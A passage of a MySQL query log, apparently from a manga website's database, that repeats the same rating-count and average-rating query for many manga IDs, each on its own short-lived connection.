ratings where manga_id = '26' order by created desc 330653930 Quit 330653931 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653931 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '82' order by created desc 330653931 Quit 330653932 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653932 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '202' order by created desc 330653932 Quit 330653933 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653933 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '6' order by created desc 330653933 Quit 330653934 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653934 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '67' order by created desc 330653934 Quit 330653935 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653935 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '267' order by created desc 330653935 Quit 330653936 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653936 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '210' order by created desc 330653936 Quit 330653937 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653937 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '180' order by created desc 330653937 Quit 330653938 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653938 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '88' order by created desc 330653938 Quit 330653939 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653939 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '129' order by created desc 330653939 Quit 330653940 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653940 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '102' order by created desc 330653940 Quit 330653941 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653941 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '113' order by created desc 330653941 Quit 330653942 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653942 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '199' order by created desc 330653942 Quit 330653943 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653943 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '288' order by created desc 330653943 Quit 330653944 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653944 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '208' order by created desc 330653944 Quit 330653945 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653945 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '73' order by created desc 330653945 Quit 330653946 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653946 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '125' order by created desc 330653946 Quit 330653947 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653947 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '37' order by created desc 330653947 Quit 330653948 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653948 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '213' order by created desc 330653948 Quit 330653949 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653949 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '193' order by created desc 330653949 Quit 330653950 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653950 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '86' order by created desc 330653950 Quit 330653951 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653951 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '117' order by created desc 330653951 Quit 330653952 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653952 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '91' order by created desc 330653952 Quit 330653953 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653953 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '307' order by created desc 330653953 Quit 330653954 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653954 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '24' order by created desc 330653954 Quit 330653955 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653955 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '84' order by created desc 330653955 Quit 330653956 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653956 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '243' order by created desc 330653956 Quit 330653957 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653957 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '178' order by created desc 330653957 Quit 330653958 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653958 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '81' order by created desc 330653958 Quit 330653959 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653959 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '191' order by created desc 330653959 Quit 330653960 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653960 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '44' order by created desc 330653960 Quit 330653961 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653961 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '15' order by created desc 330653961 Quit 330653962 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653962 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '116' order by created desc 330653962 Quit 330653963 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653963 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '62' order by created desc 330653963 Quit 330653964 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653964 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '103' order by created desc 330653964 Quit 330653965 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653965 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '109' order by created desc 330653965 Quit 330653966 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653966 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '14' order by created desc 330653966 Quit 330653967 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653967 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '42' order by created desc 330653967 Quit 330653968 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653968 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '257' order by created desc 330653968 Quit 330653969 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653969 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '324' order by created desc 330653969 Quit 330653970 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653970 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '201' order by created desc 330653970 Quit 330653971 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653971 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '120' order by created desc 330653971 Quit 330653972 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653972 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '10' order by created desc 330653972 Quit 330653973 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653973 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '2' order by created desc 330653973 Quit 330653974 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653974 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '198' order by created desc 330653974 Quit 330653975 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653975 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '16' order by created desc 330653975 Quit 330653976 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653976 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '261' order by created desc 330653976 Quit 330653977 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653977 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '203' order by created desc 330653977 Quit 330653978 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653978 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '338' order by created desc 330653978 Quit 330653979 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653979 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '271' order by created desc 330653979 Quit 330653980 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653980 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '237' order by created desc 330653980 Quit 330653981 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653981 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '224' order by created desc 330653981 Quit 330653982 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653982 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '53' order by created desc 330653982 Quit 330653983 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653983 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '231' order by created desc 330653983 Quit 330653984 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653984 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '100' order by created desc 330653984 Quit 330653985 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653985 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '293' order by created desc 330653985 Quit 330653986 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653986 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '107' order by created desc 330653986 Quit 330653987 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653987 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '241' order by created desc 330653987 Quit 330653988 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653988 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '312' order by created desc 330653988 Quit 330653989 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653989 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '181' order by created desc 330653989 Quit 330653990 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653990 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '126' order by created desc 330653990 Quit 330653991 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653991 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '20' order by created desc 330653991 Quit 330653992 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653992 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '234' order by created desc 330653992 Quit 330653993 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653993 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '18' order by created desc 330653993 Quit 330653994 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653994 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '122' order by created desc 330653994 Quit 330653995 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653995 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '190' order by created desc 330653995 Quit 330653996 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653996 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '227' order by created desc 330653996 Quit 330653997 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653997 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '284' order by created desc 330653997 Quit 330653998 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653998 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '322' order by created desc 330653998 Quit 330653999 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653999 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '123' order by created desc 330653999 Quit 330654000 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654000 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '196' order by created desc 330654000 Quit 330654001 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654001 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '308' order by created desc 330654001 Quit 330654002 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654002 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '266' order by created desc 330654002 Quit 330654003 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654003 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '226' order by created desc 330654003 Quit 330654004 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654004 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '11' order by created desc 330654004 Quit 330654005 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654005 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '219' order by created desc 330654005 Quit 330654006 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654006 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '72' order by created desc 330654006 Quit 330654007 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654007 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '292' order by created desc 330654007 Quit 330654008 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654008 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '34' order by created desc 330654008 Quit 330654009 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654009 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '221' order by created desc 330654009 Quit 330654010 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654010 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '174' order by created desc 330654010 Quit 330654011 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654011 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '209' order by created desc 330654011 Quit 330654012 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654012 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '222' order by created desc 330654012 Quit 330654013 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654013 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '251' order by created desc 330654013 Quit 330654014 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654014 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '194' order by created desc 330654014 Quit 330654015 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654015 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '327' order by created desc 330654015 Quit 330654016 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654016 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '119' order by created desc 330654016 Quit 330654017 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654017 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '298' order by created desc 330654017 Quit 330654018 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654018 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '65' order by created desc 330654018 Quit 330654019 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654019 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '200' order by created desc 330654019 Quit 330654020 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654020 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '187' order by created desc 330654020 Quit 330654021 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654021 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '185' order by created desc 330654021 Quit 330654022 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654022 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '311' order by created desc 330654022 Quit 330654023 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654023 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '184' order by created desc 330654023 Quit 330654024 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654024 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '235' order by created desc 330654024 Quit 330654025 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654025 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '242' order by created desc 330654025 Quit 330654026 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654026 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '331' order by created desc 330654026 Quit 330654027 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654027 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '211' order by created desc 330654027 Quit 330654028 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654028 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '176' order by created desc 330654028 Quit 330654029 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654029 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '321' order by created desc 330654029 Quit 330654030 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654030 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '339' order by created desc 330654030 Quit 330654031 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654031 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '183' order by created desc 330654031 Quit 330654032 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654032 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '220' order by created desc 330654032 Quit 330654033 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654033 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '349' order by created desc 330654033 Quit 330654034 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654034 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '249' order by created desc 330654034 Quit 330654035 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654035 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '246' order by created desc 330654035 Quit 330654036 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654036 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '215' order by created desc 330654036 Quit 330654037 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654037 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '275' order by created desc 330654037 Quit 330654038 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654038 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '287' order by created desc 330654038 Quit 330654039 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654039 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '195' order by created desc 330654039 Quit 330654040 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654040 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '212' order by created desc 330654040 Quit 330654041 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654041 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '280' order by created desc 330654041 Quit 330654042 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654042 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '278' order by created desc 330654042 Quit 330654043 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654043 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '330' order by created desc 330654043 Quit 330654044 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654044 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '229' order by created desc 330654044 Quit 330654045 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654045 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '186' order by created desc 330654045 Quit 330654046 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654046 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '326' order by created desc 330654046 Quit 330654047 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654047 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '256' order by created desc 330654047 Quit 330654048 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654048 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '270' order by created desc 330654048 Quit 330654049 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654049 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '114' order by created desc 330654049 Quit 330654050 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654050 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '294' order by created desc 330654050 Quit 330654051 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654051 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '276' order by created desc 330654051 Quit 330654052 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654052 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '320' order by created desc 330654052 Quit 330654053 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654053 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '250' order by created desc 330654053 Quit 330654054 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654054 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '216' order by created desc 330654054 Quit 330654055 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654055 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '277' order by created desc 330654055 Quit 330654056 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654056 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '236' order by created desc 330654056 Quit 330654057 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654057 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '358' order by created desc 330654057 Quit 330654058 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654058 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '188' order by created desc 330654058 Quit 330654059 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654059 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '272' order by created desc 330654059 Quit 330654060 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654060 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '118' order by created desc 330654060 Quit 330654061 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654061 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '262' order by created desc 330654061 Quit 330654062 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654062 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '28' order by created desc 330654062 Quit 330654063 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654063 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '371' order by created desc 330654063 Quit 330654064 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654064 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '281' order by created desc 330654064 Quit 330654065 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654065 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '254' order by created desc 330654065 Quit 330654066 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654066 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '323' order by created desc 330654066 Quit 330654067 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654067 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '328' order by created desc 330654067 Quit 330654068 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654068 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '361' order by created desc 330654068 Quit 330654069 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654069 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '238' order by created desc 330654069 Quit 330654070 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654070 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '347' order by created desc 330654070 Quit 330654071 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654071 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '1' order by created desc 330654071 Quit 330654072 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654072 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '286' order by created desc 330654072 Quit 330654073 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654073 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '255' order by created desc 330654073 Quit 330654074 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654074 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '372' order by created desc 330654074 Quit 330654075 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654075 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '315' order by created desc 330654075 Quit 330654076 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654076 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330654076 Quit 330654077 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654077 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '313' order by created desc 330654077 Quit 330654078 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654078 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '325' order by created desc 330654078 Quit 330654079 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654079 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '260' order by created desc 330654079 Quit 330654080 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654080 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '348' order by created desc 330654080 Quit 330654081 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654081 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '285' order by created desc 330654081 Quit 330654082 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654082 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '319' order by created desc 330654082 Quit 330654083 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654083 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where 